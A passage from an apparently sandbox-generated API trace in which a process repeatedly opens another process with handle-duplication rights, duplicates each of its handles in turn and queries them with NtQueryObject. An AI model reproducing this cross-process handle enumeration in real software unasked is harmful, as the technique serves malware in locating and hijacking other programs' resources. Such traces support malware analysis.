ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.326] CloseHandle (hObject=0x1b8) returned 1 [0113.327] CloseHandle (hObject=0x198) returned 1 [0113.327] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.327] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1d4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.327] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.327] CloseHandle (hObject=0x1b8) returned 1 [0113.327] CloseHandle (hObject=0x198) returned 1 [0113.327] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.327] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1d8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.327] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.328] CloseHandle (hObject=0x1b8) returned 1 [0113.328] CloseHandle (hObject=0x198) returned 1 [0113.328] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.328] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.328] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.328] CloseHandle (hObject=0x1b8) returned 1 [0113.328] CloseHandle (hObject=0x198) returned 1 [0113.328] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.329] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.329] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.329] CloseHandle (hObject=0x1b8) returned 1 [0113.329] CloseHandle (hObject=0x198) returned 1 [0113.329] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.329] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.329] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.329] CloseHandle (hObject=0x1b8) returned 1 [0113.330] CloseHandle (hObject=0x198) returned 1 [0113.330] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.330] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1e8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.330] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.330] CloseHandle (hObject=0x1b8) returned 1 [0113.330] CloseHandle (hObject=0x198) returned 1 [0113.330] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.330] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.330] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.331] CloseHandle (hObject=0x1b8) returned 1 [0113.331] CloseHandle (hObject=0x198) returned 1 [0113.331] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.331] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1f0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.331] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.331] CloseHandle (hObject=0x1b8) returned 1 [0113.331] CloseHandle (hObject=0x198) returned 1 [0113.331] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.331] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1f4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.332] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.332] CloseHandle (hObject=0x1b8) returned 1 [0113.332] CloseHandle (hObject=0x198) returned 1 [0113.332] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.332] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1f8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.332] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.332] CloseHandle (hObject=0x1b8) returned 1 [0113.333] CloseHandle (hObject=0x198) returned 1 [0113.333] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.333] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x1fc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.333] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.333] CloseHandle (hObject=0x1b8) returned 1 [0113.333] CloseHandle (hObject=0x198) returned 1 [0113.333] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.333] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x200, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.333] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.334] CloseHandle (hObject=0x1b8) returned 1 [0113.334] CloseHandle (hObject=0x198) returned 1 [0113.334] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.334] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x204, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.334] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.334] CloseHandle (hObject=0x1b8) returned 1 [0113.334] CloseHandle (hObject=0x198) returned 1 [0113.335] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.335] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x208, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.335] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.335] CloseHandle (hObject=0x1b8) returned 1 [0113.335] CloseHandle (hObject=0x198) returned 1 [0113.335] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.335] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.335] CloseHandle (hObject=0x198) returned 1 [0113.336] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.336] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x210, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.336] CloseHandle (hObject=0x198) returned 1 [0113.336] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.336] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x214, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.336] CloseHandle (hObject=0x198) returned 1 [0113.336] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.336] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x218, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.336] CloseHandle (hObject=0x198) returned 1 [0113.337] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.337] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.337] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.337] CloseHandle (hObject=0x1b8) returned 1 [0113.337] CloseHandle (hObject=0x198) returned 1 [0113.337] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.337] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x220, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.337] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.338] CloseHandle (hObject=0x1b8) returned 1 [0113.338] CloseHandle (hObject=0x198) returned 1 [0113.338] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.338] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x224, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.338] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.338] CloseHandle (hObject=0x1b8) returned 1 [0113.338] CloseHandle (hObject=0x198) returned 1 [0113.338] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.338] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x228, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.339] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.339] CloseHandle (hObject=0x1b8) returned 1 [0113.339] CloseHandle (hObject=0x198) returned 1 [0113.339] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.339] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.339] CloseHandle (hObject=0x198) returned 1 [0113.339] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.339] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x230, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.340] CloseHandle (hObject=0x198) returned 1 [0113.340] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.340] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x234, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.340] CloseHandle (hObject=0x198) returned 1 [0113.340] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.340] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x238, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.340] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.340] CloseHandle (hObject=0x1b8) returned 1 [0113.340] CloseHandle (hObject=0x198) returned 1 [0113.340] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.341] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x23c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.341] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.341] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.341] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.342] CloseHandle (hObject=0x1b8) returned 1 [0113.342] CloseHandle (hObject=0x198) returned 1 [0113.342] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.343] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x240, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.343] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.343] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.343] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0113.343] CloseHandle (hObject=0x1b8) returned 1 [0113.343] CloseHandle (hObject=0x198) returned 1 [0113.343] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.343] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x244, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.343] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.344] CloseHandle (hObject=0x1b8) returned 1 [0113.344] CloseHandle (hObject=0x198) returned 1 [0113.344] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.344] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x248, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.344] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.344] CloseHandle (hObject=0x1b8) returned 1 [0113.344] CloseHandle (hObject=0x198) returned 1 [0113.345] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.345] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x24c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.345] CloseHandle (hObject=0x198) returned 1 [0113.345] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.345] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x250, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.345] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.345] CloseHandle (hObject=0x1b8) returned 1 [0113.345] CloseHandle (hObject=0x198) returned 1 [0113.345] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.346] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x254, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.346] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.346] CloseHandle (hObject=0x1b8) returned 1 [0113.346] CloseHandle (hObject=0x198) returned 1 [0113.346] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.346] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x258, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.346] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.346] CloseHandle (hObject=0x1b8) returned 1 [0113.347] CloseHandle (hObject=0x198) returned 1 [0113.347] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.347] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x25c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.347] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.347] CloseHandle (hObject=0x1b8) returned 1 [0113.347] CloseHandle (hObject=0x198) returned 1 [0113.347] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.347] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x260, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.347] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.348] CloseHandle (hObject=0x1b8) returned 1 [0113.348] CloseHandle (hObject=0x198) returned 1 [0113.348] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.348] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x264, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.348] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.348] CloseHandle (hObject=0x1b8) returned 1 [0113.348] CloseHandle (hObject=0x198) returned 1 [0113.348] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.349] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x268, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.349] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.349] CloseHandle (hObject=0x1b8) returned 1 [0113.349] CloseHandle (hObject=0x198) returned 1 [0113.349] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.349] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x26c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.349] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.349] CloseHandle (hObject=0x1b8) returned 1 [0113.350] CloseHandle (hObject=0x198) returned 1 [0113.350] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.350] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x270, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.350] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.350] CloseHandle (hObject=0x1b8) returned 1 [0113.350] CloseHandle (hObject=0x198) returned 1 [0113.350] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.350] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x274, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.350] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.351] CloseHandle (hObject=0x1b8) returned 1 [0113.351] CloseHandle (hObject=0x198) returned 1 [0113.351] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.351] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x278, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.351] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.351] CloseHandle (hObject=0x1b8) returned 1 [0113.351] CloseHandle (hObject=0x198) returned 1 [0113.351] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.351] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x27c, 